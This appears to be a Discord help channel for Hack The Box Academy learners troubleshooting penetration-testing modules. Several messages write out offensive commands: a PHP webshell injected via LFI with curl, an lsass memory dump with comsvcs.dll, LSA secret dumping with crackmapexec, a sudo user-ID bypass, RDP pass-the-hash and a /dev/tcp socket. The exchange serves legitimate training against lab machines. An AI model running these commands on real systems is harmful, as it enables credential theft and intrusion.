#modules

1 messages · Page 143 of 1

cloud temple
#

starts at this

fathom pendant
#

You'd do it as dig axfr subdomain.inlanefreight.htb @ip

cloud temple
#

OH

iron hazel
#

Hi guys I am curious, if you start with a bad webshell or other semi intetactiv shell what is the first thing u do. Do u immediately get a msfvenom shell to the machine?

#

For the purposes of htb course

slate creek
#

Hi all module: Attacking Common Services HARD
Question 1, What file can you retrieve that belongs to the user "simon"? (Format: filename.txt). I tried enumerating smb with smbclient, just see the shares, not able to login using the username simon, tried bruteforcing but not working, seems like all passwords are turning correct...., enumerated bruteforced all services but no chance. any tips please?

cloud temple
#

i gave up so i just made it do it automatically using a simple bash script i made

hallow kiln
cloud temple
#

i just made it do "dig afxr" with every other line from the outpt

slate creek
hallow kiln
#

You got it?

fathom pendant
slate creek
#

yes, but I am quite sure I tried it before, don't know why didn't work before. lol

cloud temple
#

solved it finally

fathom pendant
#

You can also dig txt

cloud temple
#

ik

#

onto the last question of Active Subdomain Enumeration

fathom pendant
#

But the axfr gives you more info for the next questions

hallow kiln
next kelp
#

I want to be a professional in digital illustration. Python is far from my reality. But let's go!!!!! ......htb ⚽ 🏈

fathom pendant
next kelp
#

Yes I know!!!!! But I like Python a lot. I have a brother of mine who is a software engineer and how he would like to learn and pursue a career in this area as well, if you know what I mean.

supple patio
#

funny

next kelp
#

Many people have two professions and they manage to stay that way for the rest of their lives.

fathom pendant
oblique spoke
#

Hello! I got stuck at Password Attacks, Attacking SAM. There is this last question about Dump the LSA secrets. I got the users through SAM dump but i cant dump remotely the LSA secrets, is ther any tip for that?

fiery berry
oblique spoke
fathom pendant
#

Put || in front and behind the command ||lol||

oblique spoke
#

| test |

#

|| test ||

#

|| crackmapexec smb ip --local-auth -u usr -p pw--lsa ||

fathom pendant
#

Add a space after the pw

oblique spoke
#

yeah thats okay

#

i just edited it

fiery berry
#

make sure to use a highly privileged user

fathom pendant
#

That too

oblique spoke
#

aham

fathom pendant
#

Lsa dumps can only happen with enough privs

oblique spoke
#

thats what i was thinking, but the hashaes didnt contained any high priv user

#

admin field was empty

#

but there is probably something that im missing, thank you

fiery berry
oblique spoke
fiery berry
oblique spoke
barren apex
#

Whoever wrote the Thick-Client applications topics in Attacking common Applications is mental. All this teaches you is how to copy code

thorny hamlet
#

What is the biggest module in terms of content? just finishing up password attacks and she was HUGE haha

barren apex
thorny hamlet
barren apex
thorny hamlet
#

Yeah it says that on the tin but its taken me much longer

barren apex
#

Wait til the 4 day ones lol

thorny hamlet
#

especially with the skills assessments, where you're brute forcing for some period of time

barren apex
#

not complaining they are really good modules, just big chunky boys

thorny hamlet
#

oh yeah absolutely man! they're amazing - gg to the HTB team

barren apex
#

I am complaining about attacking common applications as its ridiciulous

thorny hamlet
#

haha really? what's broken

barren apex
#

theyve just rehashed a insane box walkthrough and all it teaches is how to copy code to solve that problem

thorny hamlet
#

could potentially put the code into snyk add-on for vs code?

#

idk

#

sure I'll have loads of fun when I land on her haha prayge

barren apex
#

you have to decompile and tweak the source code for this custom application, good in hack the box. not good in academy

fading cairn
#

guys im doing the ATTACKING ENTERPRISE NETWORKS module currently I'm trying to enumerate the blog.inlanefreight.local but every time i try to register and account or login i get the following error "The website encountered an unexpected error. Please try again later." is this part of the assessment or is it an error that should be solved ???

fathom pendant
fierce island
#

did you ever figure this out? I am in the same boat

barren apex
fathom pendant
#

Thick client has been wildly agreed upon to be the dumbest addition to that module

sly dome
#

im literally skipping it

#

lol

barren apex
#

yeah it just teaches you to copy code rather understand anythign

hallow kiln
#

looking forward to seeing that mess lol

fathom pendant
sly dome
#

wasnt that the Java application

barren apex
sly dome
barren apex
#

yeah you need to reverse and modify it

sly dome
#

i have the questions already filled

#

i used the Fatty write up as guide

barren apex
#

yeah what ive been doing

sly dome
#

nice decision

#

thats why i said im skipping it

barren apex
#

just spending hours trying to get this stupid fiddly 1 time use application to work when im trying to learn

#

it makes sense in HTB not academy

sly dome
#

true af

topaz scaffold
#

can someone explain to me how this works and why cme didn't find it? 🙂

sly dome
#

spoilers

#

cme is giving a weird error related to the response received

#

just use hydra for FTP

#

try with NetExec and if it still doesnot work you can reach the developers in its Discord

#

and they will ask you to open an issue, they will fix it

tame ivy
#

Hello everyone,Module:Footprinting,Section:Hard Lab, i have found open ports, tried enum a pop3 and imap but need creds, tried braa and snmpwalk but there is nothing, trying right now a onesixtyone to bruteforce, but there is nothing also(tried 2 different wordlist), could anyone help me pls?

topaz scaffold
sly dome
#

cant be much slower since its the same software 🤣

#

just renamed

#

cme is dead

#

has to be anything else

#

you can use threads

topaz scaffold
#

idk, it has like 1 sec between tries, maybe i can increase the threads

sly dome
#

the order is onesixtyone bruteforce community string and after that snmpwalk with the community string

sly dome
#

error was faster than successful try

autumn mirage
#

Hi folks

I am preparing for the offsec OSWE exam. Which HTB Academy modules would you recommend?

acoustic owl
pearl matrix
#

Is there any module about Recon at HTB?

hallow kiln
barren apex
#

praise the lord that is over

#

back to changing url paramters on tomcat

rustic sage
#

Can anybody please help me? I am in Linux Privilege Escalation, in the Sudo module, and I found the flag.txt using 'sudo -u#-1 /bin/ncdu cd /root,' but I can't read the contents of flag.txt.

hallow kiln
#

but I also recommend googling about ncdu, there's a way to drop into a root shell

rustic sage
naive wadi
#

Sounds like its not the right directory

hallow kiln
#

mostly sounds like it's not meant to work that way

#

have you looked up exactly what ncdu does and how it works and what arguments it expects?

rustic sage
barren apex
tame ivy
#

Module:Windows Priv Esc
Section:Weak permissions
done everything and got a administrator group, but cannot dir a folder with a flag, could anyone help me?

subtle flicker
#

Module: Local File Inclusion
Section: RCE
I understood and replied the concept for RCE using LFI, the problem is when i try to 'cat' a file, or try to trigger a reverse shell. Seems like i can only pass a single command(id, whoami) and whenever i use spaces or some other character it just doesn't execute the payload anymore. I tried to close the command in ' ' or to URL encode but neither worked. Some hints? The goal is to read the flag in /
For example this request doesn't work: ||curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=cat /flag.txt" (of course i changed the IP and PORT)||

barren apex
#

or instead of trying to inject that PHP shell you could try one that spawns a rev shell

subtle flicker
barren apex
#

im pretty sure i done that one with just the simple web shell. is the flag defo called flag.txt and not a bunch of random numbers like some of them

steep blaze
#

Hi everyone
Does anyone coud help me to solve the last question of Documenting & reporting assessment please?

subtle flicker
barren apex
subtle flicker
slate creek
#

hi, struggling with the lab Attacking Common Services Hard, last question, I am at the stage of looking for mssql users to impersonate, I found the user J**** only, but seems like there should be 2 impersonable users, I am really lost and have no idea what is the next step I need to take. I found the second server with as well, but have no clue how to connect to it as well.

fathom pendant
#

But idk how deep you are into it

#

You can impersonate other users for sure though

#

Just follow steps in the sql section to figure it out

sly dome
#

🤦‍♀️

tame ivy
tranquil breach
#

Hello. Why i can not own vip machine? Do i need to pai Money?😪😪

#

Ok i see 14$/month

fathom pendant
#

Wrong chat btw my guy

obtuse oxide
#

Not sure if this is the right place to ask, but are parrot servers down right now?

#

I'm getting slow speeds on both their linux distro downloads and apt repos

fathom pendant
covert void
#

Hey, hope this question is correct to ask here, but I am trying to start the browser VM and I am being told that I have 1 instance a day and I can't open it. I used a web VM for the intro module...but was that it? I cant just use that one? There was like 180 mins remaining on it. Am I missing something?

fathom pendant
#

When you close it out/terminate it, that's it

#

You can use your own vm and download the vpn configuration file all you want

#

Or subscribe

covert void
#

I was afraid of that. Okay.

fathom pendant
#

Or buy cubes

covert void
#

thank you @fathom pendant

fathom pendant
#

Why would you be afraid of that?

#

Lol they're a company. They're all about making money, and the pwnbox is a convenience thing rather than a need to use thing

#

Like you can absolutely get by using your own vm

covert void
#

I mean VMs are billed by the hour, so it should be no problem just letting users use it until time is up. But like you said, they are focused on dat cash $$. So I understand.

fathom pendant
#

Well their stuff is hosted in their infrastructure mostly

#

You're paying for the convenience to use it, and you aren't paying an hourly rate for it

#

Literally just give them any amount of money, i.e. buying the smallest cube option, and you get it unlimited

#

Forever

covert void
#

Unlimited VMs forever for $5

#

?^

fathom pendant
#

Unlimited pwnbox usage forever

#

The vpn and using your own vm is always free

covert void
#

That's not that bad

#

Thanks for the info

fathom pendant
#

you'll end up paying for later content anyway ¯_(ツ)_/¯

covert void
#

For the tests?

fathom pendant
#

No I mean you literally cannot do all of the content without paying some amount of money

covert void
#

Ah

fathom pendant
#

Only the tier 0 content is relatively free as they full refund the cubes

covert void
#

So some modules you will never have enough cubes until you buy

fathom pendant
#

Iirc someone did the math and it was like one month Plat and one month silver to have all the cubes for cpts

covert void
#

so $86 for all material?

fathom pendant
#

Unless you're a uni student then do the student sub for $8/month AND you get access to all the modules up to and including tier2

covert void
#

👍

rustic sage
#

Hello, I am currently working on the module Web requests/POST and I cant seem to figure out how to correctly formulate the command to get the flag

cedar void
#

Is it possible that I run this command 'rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full' and the reason why I cannot locate the 'lsass.dmp' file( using the 'dir /s lsass.dmp' command ) is because the AV software prevented that command from creating 'lsass.dmp'

cedar void
topaz scaffold
#

you cannot generate it in C:
donno why

#

i don't know why, put it in C:\Users\<User>\

rustic sage
cedar void
#

I also used 'Administrator' as username and that also didn't work

sly dome
#

it works with -d

#

oh youre doing it from windows

rustic sage
#

yea

sly dome
#

curl is a alias for iwr

#

i dont know how it works there

#

just use parrot or kali and the usual curl

rustic sage
#

okay thank you

sly dome
#

also you can do it from browser

#

changing the user agent

#

you create a custom device and put curl user-agent there

#

then enable the device emulation and voila

winged elbow
#

could i get some help to reset akerva

#

need 4 more people

thorn urchin
#

read #welcome to access the rest of the server

winged elbow
#

sorry about that

#

thanks

rustic sage
sly dome
#

transfer to windows and double click once to mount

#

after mounted double click to open

tranquil raven
#

Can you please explain me one thing. i am currently going through the web attacks module, IDOR. it talks about changing a parameter, but what if there is a post request containing only an action with no user id, for example {'new_name': 'Alex'}. i assume the user id is in the cookie. Does this apply to idor? and is it possible to hack this if for example the id is stored in PHPSESSID?

sly dome
#

follow the cpts path

rustic sage
sly dome
#

yes

#

it’s taught on the module

#

under protected archives iirc

#

what

#

double click it

#

and it will get mounted as drive

#

you dont need any program

#

that didnot happen to me

#

i dont know

#

probably 7z opens it

tranquil raven
sly dome
#

disk management > action > attach vhd

#

you have to be Administrator of your PC

#

but this manual method should be automatically done when double clicking

elfin cedar
#

Anyone there that has done the Attacking Enterprise Networks Web -Enumeration & Exploitation module or has had a similar issue? I am tampering with the HTTP verb. Its just a blank response in Repeater

tiny reef
#

I´m on "Whitebox Attacks - Clientside ProtoPollution" and I think I need a sanity check, DM would be appreciated

tame ivy
#

Module:Windows Priv Esc,Section:Citrix, what i need to type here? i tried ||humongousretail.com|| but it gives error, could anyone help pls?

upper ruin
#

Module: Footprinting - Lab Hard:
Task:
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.

For now:
I was able to find the SSH key and log as ||tom||, I found some UID stuff, but nothing more, how can I continue? Does it have to do something with the info I found here ||https://gyazo.com/1811c8b8459cc7cfe2f8058670cd6f65|| I saw previous comments that talked about ||mysql|| How can I access this service?

tame ivy
analog dock
upper ruin
#

Duh, is there a port where it even runs the service.

upper ruin
#

I ran through all the directories.

analog dock
#

When you log in do ls -la

#

You can ssh to root with the key

upper ruin
#

I did simply ls ;-;

#

BRUH

#

I thought of downloading LimEnum on the target

#

To esacalate to admin

analog dock
#

Nah it’s a footprinting module, not privesc

upper ruin
#

Damn..ls -la is better than ls.

#

Thank You 2, kind people.

#

o7

upper ruin
analog dock
upper ruin
#

Oh..lemme try that.

#

I thought I had to log in as tom and do shenanigans there.

#

It workedd.

#

But is that like..specific or it will require a password?

#

Or is it general that when I have an SSH key I can log in to root.

analog dock
#

It’s not general

upper ruin
#

Oh so it's just this time.

analog dock
#

Yeah this time

upper ruin
#

Thank You, I found the ||users.sql||

analog dock
#

You’re welcome

#

It’s not accessible with tom’s perms right?

upper ruin
#

Nah.

#

Lemme send you a screenie.

analog dock
#

Alright; then I do remember correctly

tiny reef
#

Anybody here who has done Whitebox Attacks ?? I´m losing my mind over Client-Side Prototype pollution rn, I already got some XSS going....

cedar void
sterile epoch
#

exec 3<>/dev/tcp/10.10.10.32/80
any idea how to use it?

undone narwhal
cedar void
undone narwhal
#

Your smbserver command is wrong

fathom pendant
#

^

sly dome
#

🤣

#

the module teaches the right syntax

#

also there are examples in the help panel

sterile epoch
#

am I using it wrong?

sly dome
#

what do you think about skipping metasploit module?

#

if im experienced with it

#

coz i want to do attack common services

#

this night

cedar void
tiny reef
sly dome
#

i have like 4 sections done for the common services one just to answer some questions on this chat xD

undone narwhal
cedar void
#

Its my first time running it and I didn't understand it fully the first time. I live and learn, thats life

tiny reef
#

Still nobody online for Prototype Pollution? bin_joy I´m pretty sure I went down the right rabbit hole but still not getting it to work

shut wraith
#

Brute Force Skills Assessment 2

  1. I used cupp -i using Harry Potter's information for the password list
  2. I created a username list ./username-anarchy Harry Potter > harry.txt
  3. I used hydra hydra -L userharry.txt -P harry.txt -u -f ssh://94.237.59.185:47416 -t 4

It's been a half an hour now and no hit. I repeated exactly what we did in the module again, but it seems I am wrong. Please help

tiny reef
#

Shouldn´t take half an hour

#

Hint: Try to work with minimal information for the wordlist in the beginning and gradually increase what you add using cupp

shut wraith
tulip dragon
#

Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. getting no response from the ls command after logged in smb

bright forum
#

Please I do I login to the terminal back

#

How do I login back

blissful elm
#

..

#

he also have same problem

#

@tulip dragon

thorn urchin
#

its telling yall access denied

#

means bad login info/wrong share

tulip dragon
#

ok

warm sand
#

i've been trying to figure this one but i was not able to get the new name, any chance for where to look for? thanks got it

tulip dragon
sly dome
#

let me try in my side

#

it works for me with the correct share

#

smbclient //10.129.17.74/spoiler -U 'spoiler'

#

try resetting if you are doing it correctly

thorn urchin
#

<@&861185840277487616>

jolly cradle
#

ty @thorn urchin

wanton mica
#

Popular unpopular opinion: Attacking thick client applications is the worst section in the Attacking Common Applications module and does not belong.

That is all, now I have more pain…err…I mean learning to do and alcohol to drink

tulip dragon
tulip dragon
sly dome
#

great how FTP service does not even wake up with target spawn in common services module 🙂

#

how did you solve this part? i’ve reset it 5 times but still no FTP service showing up

#

7 resets 🤣 niceone

smoky jackal
#

hi quick question, i'm on the windows privilege escalation module - section Further Credential Theft
I'm stuck on this question: Find and submit the password for the root user to access https://vc01.inlanefreight.local/ui/login
I've got all the other questions but I'm unsure if I'm missing something or simply over-looking something very obvious.

fathom pendant
undone narwhal
shut matrix
#

Just finished the Windows event logs and finding evil, found it quite challenging was good.

rich perch
#

Hello! I'm stuck at the "Password Spraying" section of Using CrackMapExec. The question is "Which other account has the STATUS_PASSWORD_MUST_CHANGE flag?". The only user I can find is peter, but that doesn't work. I tried both peter and inlanefreight.htb\peter.

acoustic owl
rich perch
acoustic owl
#

At the very beginning of the module you need to create a user list. Use this list

elfin cedar
#

would anybody know why the command "download" is not working in Evil-WinRM? I get an error

#

nevermind its working now

#

so weird

fathom pendant
#

Eh the tool is always weird

sly dome
#

anyways managed to do it was just a matter of resets o.O

candid lily
#

any idea why crackmapexec doesnt dump lsa

sly dome
#

no admin privileges

#

you need (Pwn3d!)

#

like when you can do psexec

candid lily
#

but the user has access to dump lsa

#

SeDubugPrivilege

sly dome
#

?

candid lily
#

the user has privilege to get lsass.DMP

sly dome
#

if it is not an local or domain admin

sly dome
#

not only SeDebugPrivilege

candid lily
#

well but this says me to do so

sly dome
#

yes with a minidump then

#

use pypykatz from linux or RDP and do it from the task manager

candid lily
#

i manually created dump from task manager and transferred it to my machine, but idk how to crack it

sly dome
#

pypykatz for example

tiny reef
#

I´m back at the Client Side Prototype Pollution from Whitebox Attacks.. anybody here who can give a sanity check?

sly dome
#

anyways this is weird i just noticed you are installing impacket-scripts

#

you git cloned it

#

the best way to install is pipx

#

check the file pointed by the symbolic link

#

👀

#

just install it following the github repo instructions

#

then

#

cd /opt/impacket

#

pipx install .

#

easy as that

fathom pendant
#

It also probably doesn't help you're moving around as root

#

Oh wait nvm

#

I'm dumb

#

I'm used to root being the red color

#

Not regular user

#

But yeah tbh why are you su to root to do things?

sly dome
#

not installed in the normal user

#

installed in this user

vital adder
#

be careful what you install with inpacket, it's really want to broke brain_expand but here some stuff i used to install impacket in a virtual environment (on the pwnbox)

wget https://github.com/fortra/impacket/releases/download/impacket_0_11_0/impacket-0.11.0.tar.gz; tar -xf impacket-0.11.0.tar.gz;cd impacket-0.11.0/

virtualenv --python=python3 impacket
source impacket/bin/activate

python3 setup.py install
sly dome
#

nice

sly dome
fathom pendant
#

You can do both

sly dome
#

pipx way better

#

you dont have to play around with source activate

vital adder
sly dome
#

🤷🏻‍♂️ try pipx

#

you will be surprised for sure

solar urchin
#

Aye will going to college help with hacking? Like computer science or coding classes or what?

sly dome
#

read the instructions from the source 🤣

vital adder
fathom pendant
gentle coral
#

good morning all, currently doing the Bypassing Encoded References within the Web Attacks module, and having an issue with the script to get the 20 employment_contracts.
So the code I have at the moment is:

for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
curl -sOJ -X POST -d "filename=contract_$hash.pdf"
http://<server>:<port>/download.php
done
done

I've had a look through Burp and thats how I came up with the 'filename=' part (oh and obviously i've changed the IP and Port lol). I don't know what it is with this module, i understand the concept but just can't seem the get the parameters correct. Any help greatly appreciated.

fathom pendant
gentle coral
#

i was wondering why the formatting looked terrible, it wasn't like that when i was typing. i'll reedit

rustic sage
#

does someone knows why I am getting this weird output? and why is after my port 1234 the number 72 (green)? Every time I press enter, a new one appears: "PS C:\Users/name"

fathom pendant
rustic sage
#

Hello I am in module Linux Local Privilege Escalation - Skills Assessment and i am trying to get the flag5 but the sudo busctl doesn't give me a root shell. Any help?

rustic sage
umbral fulcrum
#

Hey guys, quick Q about Joomla template code, does it decrypt md5 automatically ??

tiny reef
#

@acoustic owl you helped me with whitebox attacks, ppollution, can I DM you for a sanity check for Client-side pollution?

fiery berry
gentle coral
safe marsh
#

I'm currently stuck here too. The services.exe is incorrect. I can't sleep HAHAHA

acoustic owl
#

After that you should be able to sleep again 😉

safe marsh
acoustic owl
safe marsh
acoustic owl
tepid pagoda
#

Hello! I'm currently doing Intro to assembly module and I've run into an issue regarding debugging elf files. When I try gdb -q ./hello_world I get:
Reading symbols from ./hello_world...
(No debugging symbols found in ./hello_world)
I also tried debugging the elf file given in section Assembling & Disassembling but I got the same result

cedar void
tepid pagoda
autumn pilot
#

read the error message it tells you why you cannot copy the file there

cedar void
worthy arrow
#

Crack passwords

sly dome
#

a.k.a cme

cedar void
sly dome
#

you need the SYSTEM

quaint hemlock
#

How do I supposed to use Words.GetWordList() in the introduction to c# - skill assessment?

I already find out how to iterate through a wordlist but still have no idea what to do with the Words.GetWordList(), this is my current code:

class Program
{
    public static void Main(string[] args)
    {
        List<string> path = new List<string>() { "a", "b", "c" };

        foreach (var item in path)
        {
            Console.WriteLine(item);
        }
    }
}
cedar void
# sly dome you need the SYSTEM

do I need to go back to my WINDOWS machine to determine where the SYSTEM is or is the SYSTEM in the same file location on every windows machine?

sly dome
#

the SYSTEM from the machine where u got the ntds

#

but all of this process is automatized with crackmapexec

cedar void
cedar void
sly dome
#

you have to transfer SYSTEM to your machine

cedar void
sly dome
#

you need both in your machine

wary tendon
#

can anyone assist in helping me with the passwd opasswd shadow section of password attacks module i am struggling to complete the question

sly dome
wary tendon
#

could you help me i am asking

quaint hemlock
#

How do I supposed to use Words.GetWordList() in the introduction to c# - skill assessment?

I already find out how to iterate through a wordlist but still have no idea what to do with the Words.GetWordList(), this is my current code:

class Program
{
    public static void Main(string[] args)
    {
        List<string> path = new List<string>() { "a", "b", "c" };

        foreach (var item in path)
        {
            Console.WriteLine(item);
        }
    }
}

please help me with this, been stuck on this thing for days

wary tendon
sly dome
#

ask your question

#

and we can help

wary tendon
# sly dome ask your question

so i wants to know the root password from the shadow file but cant copy it to attack box no permisions i log into user will and find the .backups but cant open or copy them to unshadow

sly dome
#

set up an http server and download em from your machine

wary tendon
sly dome
#

good module to learn about this stuff

#

take a look

acoustic sparrow
#

hey guys currently at attacking common service module for RDP cant figure out how to pass the hash from the admin or more where can i find it (im not supposed to use mimikatz)

wary tendon
sly dome
#

no

#

im not doing your job

acoustic sparrow
sly dome
#

remember to enable the registry key

#

xfreerdp /u:Administrator /pth:"<hash>" /v:<IP>

acoustic sparrow
sly dome
#

its on the desktop

#

in a txt

#

RDP to 10.129.203.13 with user "htb-rdp" and password "HTBRocks!"

#

there

acoustic sparrow
#

my stupid head didnt even open the txt my fault bro sry for bothering you

#

appreciate you raf

sly dome
#

enum is key

acoustic sparrow
sly dome
#

its already cracked

#

instead of the wordlist

#

add --show

#

hashcat -m 1000 <hash> --show

#

ofc its the same from CME

misty current
tight mesa
#

hi y'all, I'm struggling to find the answer for the question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) into ACL enum section under Active Directory enum & attack

#

so far I tried by bloodhound and PowerView

#

bloodhound is not showing too much and PowerView is taking a live to show a command output

#

sweet, DM?

misty current
#

You'd need to reference the Assembly.dll library into your project to use it.

bronze axle
#

Anyone is doing this module "ACTIVE DIRECTORY ENUMERATION & ATTACKS"?

tight mesa
#

anyone can have an idea why is this error:

? : The term '_.SecurityIdentifier' is not recognized as the name of a cmdlet, function, script file,

tight mesa
naive wadi
naive wadi
#

Because you're trying to call a function/something that isn't imported into the current shell.

tight mesa
naive wadi
#

Recheck your command

#

Also just FYI you know powerview needs to be imported in different shell instances so if you open a separate shell as a user it has to be imported there too

hazy hollow
#

Hello guys

#

I- it my f- first day of joining

#

Hi guys

#

It's my first day of joinin

#

Pls I wanna learn some hacking

hazy hollow
#

I'm new

#

Your help will mean much to me

tight mesa
#

hey @hazy hollow lot of us are new in this as well, just put you comment, question concern and someone if can help he/she will, no worries about that....

hazy hollow
#

But where

#

Do I put comment on?

naive wadi
naive wadi
hazy hollow
#

Oh I really got hacked

#

Okkkkkk thxxxxx

#

Thxxx@naive wadi

tight mesa
#

LoL u r completely right, but sometimes I try do it manually to reinforce the comman in my brain

hazy hollow
#

Btw do u guys hack?

#

I rlly wanna know

#

Bcz hacking... MY FAV

naive wadi
tight mesa
#

I'm studying the cpts to certify and at the same time to have strong foundations for other certs like PNPT & OSCP trying to get in into the pentesting | red teaming field...

hazy hollow
#

Huh?

#

Ok?

dreamy solar
#

Hello I have a problem on the exercice (transfer file) I have a flag but It is not valid, so I look a video and It is the identical flag, what should I do?

fading cairn
#

hey guys im currently doing ATTACKING ENTERPRISE NETWORKS blind and i have managed to get a foothold and escalate privilege to root im currently scanning the internal network with dynamic port forwarding and nmap with this command "nmap -v -Pn -sT 172.16.8.0/23 --proxy socks4://127.0.0.1:9050 -oN scan.txt
" and i noticed it took more than 3 hours and it still hasnt finished is there any tips to make it faster, and in the CPTS exam will it take the same time ???

undone narwhal
dreamy solar
#

I already saw

fiery berry
dreamy solar
#

yes

#

I don't access administrator

fiery berry
#

yes ok, but I can't see the extracted file...

naive wadi
#

Aldo have you ensured that the file you uploaded has the same hash as the original to ensure the transfer was successful?

fiery berry
dreamy solar
fiery berry
dreamy solar
#

Ok thanks you very much

fiery berry
naive wadi
fading cairn
fiery berry
#

only TCP packets

fading cairn
orchid pine
#

hello guys]

#

im doing the web proxu model

#

in the skill assessement

#

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

#

i did all the necesseray steps

#

but when im getting the results of the attacks

#

i cannot find the correct one they all ghave the same lenght all with 200 ok respond

fading cairn
fiery berry
orchid pine
#

yes

#

<@&861185840277487616>

orchid pine
#

XD

wary tendon
#

can someone help me solve the passwd shadow section

#

trying to get root password i can get in but cant seem to have any permissions

orchid pine
#

if u can so i be able to help u brother

wary tendon
#

passord attacks

#

passwd opasswd shadow

wary tendon
orchid pine
#

ill check my notes

#

ur question was

#

?

wary tendon
wary tendon
# orchid pine ill check my notes

Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

orchid pine
#

can u tell me what u did so far

#

u can dm actually so we dont spoil other people

wary tendon
wary tendon
orchid pine
#

Use unshadow and make the output in the /tmp dir

#

Then transfer to ur local machin to crack the pass

#

If it didn’t work tell me so ill go re do the exercise

wary tendon
fathom pendant
orchid pine
#

ill redo the task

fathom pendant
#

<@&861185840277487616>

#

Fuckin scam bots

shut wraith
sly dome
#

lets go

remote fulcrum
#

I am trying Excercise 3 from Google Hacking. On and on for 3 weeks, but no result/answer. Can someone give me a nudge? It is starting to loose the fun out of the PEN-200 path.

#

So Google Hacking from Info gathering/Passive gathering

naive wadi
#

You should post what youve tried and the exact question and it'll be easier for someone to provide help

remote fulcrum
#

Well, I looked and searched on all mayor Soc Media platforms. And tried Google dorking.

#

Exact q is: What other MegaCorp One employees can you identify that are not listed on www.megacorpone.com?

sudden blaze
#

Hello everyone! Modul:Password Attacks Section:Pass the ticket from linux; Question:which group can connect to LINUX01? Im stuck - any hint

acoustic owl
sudden blaze
#

@acoustic owl first of all im a totaly newby! Tried enum4linux

acoustic owl
#

There is no Google Hacking

sudden blaze
#

@acoustic owl also evil-winrm and tried sharphound.ps1 but no luck

rustic sage
#

hey guys, sorry to interupt conversation. but i'm struggling with this https://academy.hackthebox.com/module/77/section/853 for more then 5 hrs already. I've done everything, i got root access, but when i want to get the root/root.txt file like this cat root/root.txt it just doubles the text I type and nothing happens. Any ideas? please

acoustic owl
rustic sage
#

also i tried with metaspoilt, but always getting [-] stdapi_fs_stat: Operation failed: 1

remote fulcrum
sly dome
#

bro

#

go to OffSec group

#

HAHAHAHA

acoustic owl
rustic sage
#

ah, im sorry

remote fulcrum
#

That group they say to ask here. So what is it?

rustic sage
#

my brain is like mashed potatoes already

sly dome
#

🤣

remote fulcrum
#

So getting send there and back here. Nice!

sly dome
#

this is HTB academy

naive wadi
acoustic owl
remote fulcrum
#

Wait wait wait. Totally mu fault. Mixed the 2 up.

rustic sage
#

well it is 😄

sly dome
#

😹

sudden blaze
#

@acoustic owl which section cant find it

remote fulcrum
#

Doing 2 paths at the same time.

fathom pendant
sly dome
#

no problem mate

rustic sage
#

so should be on right spot

#

can someone help me, please?

remote fulcrum
#

Sorry for that guys. Have a great evening.

sly dome
fathom pendant
rustic sage
#

well it's night for me, but i started evenining 😦

rustic sage
#

this one, please 😦

sly dome
#

no my bad

#

realm is the tool y have to look for in the section @sudden blaze

fathom pendant
rustic sage
#

I'm quite new to this, but i guess I updated everything

fathom pendant
#

Also you'd need to cat /root/root.txt

rustic sage
#

Tried with metaspoilt too, but got some error aswel

fathom pendant
#

Just follow through the section

rustic sage
fathom pendant
#

It walks you through it

rustic sage
#

i've been doing it for more then 5hrs

fathom pendant
#

You probably skipped something

rustic sage
#

but when i gain root access and type any command and sends it then it just doubles the command and does nothung

#

Hello

fathom pendant
#

Because you're not in a full shell probable

sly dome
#

probably your shell is broken

rustic sage
#

how do i fix my shell?

sly dome
#

explained in the module iirc

fathom pendant
rustic sage
sudden blaze
#

@sly dome thx had the command but didnt saw it thx

rustic sage
fathom pendant
#

python3 -c 'import pty;pty.spawn("/bin/sh")'

supple patio
rustic sage
supple patio
rustic sage
fathom pendant
rustic sage
#

give me guys 10 mins i'll be back

fathom pendant
acoustic owl
rustic sage
#

But really i tried coupled of times

fathom pendant
#

You probably skipped steps

rustic sage
#

Will try again tomorrow

#

I guess I should take rest now 😄

#

WIll give feedback tomorrow

#

is there a chance, that maybe i coppied wrongly LinEnum.sh maybe with some space or something?

#

I will try it now 😄 i won't get to sleep otherwise

fathom pendant
#

LinEnum shouldn't be necessary I don't think

rustic sage
#

btw I was using MATE terminal

fathom pendant
#

(Also linenum wouldn't break a shell)

high zinc
high zinc
#

...which you are offered directly in the learning material on the page you linked. That said it's of course good practice to copy over files still

fathom pendant
#

Just take it one step at a time

high zinc
#

^

fathom pendant
#

Don't skip over steps

#

Don't move forward too fast then try and catch up

#

Just follow the module verbatim

rustic sage
#

Ok, will keep you posted soon

rustic sage
high zinc
#

👀

rustic sage
#

and same happens

#

i sent once and it's double again 😦

#

but here is correct
connect to [10.10.14.170] from (UNKNOWN) [10.129.100.178] 36502

whoami

root

fathom pendant
#

Mhm

rustic sage
#

weir is that it does not even say who sent that cat ...

#

and i cannot do anything, its like writing in notepad 😦

fathom pendant
#

You got a response

rustic sage
#

it doesnt respond to anything expce ctrl c

fathom pendant
#

...

rustic sage
#

the response i s the same thing i type

fathom pendant
#

No it's not

#

You typed "whoami" you got "root"

rustic sage
#

that was in different terminal

fathom pendant
#

So

#

Why aren't you doing it in that terminal?

rustic sage
#

in terminal nibbler it does not work

fathom pendant
#

Yes

rustic sage
#

is i t in that?

fathom pendant
#

That's expected

rustic sage
#

ogm!!!

#

omg

#

i am idiot

fathom pendant
#

Yes

rustic sage
#

it works now

high zinc
#

nibbler is acting as a backdoor for you now. it's "blocking" as long as the root shell is active. It's the root shell you need to use now

rustic sage
#

i spent 5 hours 😦

#

ahh

fathom pendant
#

Reading is important

fathom pendant
#

The section even tells you

rustic sage
#

I guess ill never forget it

high zinc
fathom pendant
#

There you can spawn the python pty

rustic sage
#

Yeah, I am idiot

high zinc
#

so are we

#

welcome to the club

rustic sage
#

Hehe thank you so much

fathom pendant
rustic sage
#

almost midnight, wanted to sleep, but hell with sleep 😄 going further

fathom pendant
#

Rest is important

high zinc
#

we just got more experience at being dumb, Marcie hugthebox

fathom pendant
#

It helps you to avoid simple mistakes

rustic sage
#

Will try to login with different email here, seems like mine got blocked while i was trying first time

rustic sage
rustic sage
